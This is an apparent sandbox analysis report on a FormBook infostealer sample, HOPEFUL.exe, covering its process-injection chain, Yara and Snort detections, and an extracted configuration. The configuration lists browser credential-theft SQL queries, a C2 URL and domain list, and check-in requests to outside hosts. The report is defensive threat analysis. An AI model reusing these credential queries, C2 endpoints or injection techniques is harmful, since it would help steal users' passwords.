Loading ...

Play interactive tourEdit tour

Analysis Report HOPEFUL.exe

Overview

General Information

Sample Name:HOPEFUL.exe
Analysis ID:339365
MD5:9c15af175868121cc014666189d52dae
SHA1:3ba03f47a8762368538e47806353f55da43d46ac
SHA256:7c8f873fc34661a785875f76a1f3b1aff6719e69d2a4ea5d2d94f849282b623a
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • HOPEFUL.exe (PID: 6744 cmdline: 'C:\Users\user\Desktop\HOPEFUL.exe' MD5: 9C15AF175868121CC014666189D52DAE)
    • AddInProcess32.exe (PID: 6548 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 4656 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 4240 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", "eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.AddInProcess32.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.AddInProcess32.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        5.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 5.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: HOPEFUL.exeReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: HOPEFUL.exeJoe Sandbox ML: detected
          Source: 5.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HOPEFUL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HOPEFUL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmmon32.exe
          Source: Binary string: AddInProcess32.pdbpw source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HOPEFUL.exeCode function: 4x nop then jmp 0164F5EEh
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49756 -> 35.169.40.107:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 34.102.136.180:80
          Source: global trafficHTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1Host: www.the343radio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1Host: www.registeredagentfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1Host: www.tiendazoom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.98.99.30 34.98.99.30
          Source: Joe Sandbox ViewASN Name: IHNETUS IHNETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: global trafficHTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1Host: www.the343radio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?ndlpiZc=0xbExnfI3Prv/1KpQ0CN/ByOc92DgA9UHu9nxr7GrQjbPgIXGkWI8+X1opataUjCpyTL&vJBt9=0p-TOvv8KBuxgpiP HTTP/1.1Host: www.registeredagentfirm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=EnI9If5tS4P3VQhtW/9J+s0mIpyxI+H/HK4ULnRjNfqJIxJ/UO/Pi364qc4j+Eh6gi9p HTTP/1.1Host: www.tiendazoom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.the343radio.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Jan 2021 20:50:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 0000000D.00000000.325706052.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 0000000D.00000000.320958495.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
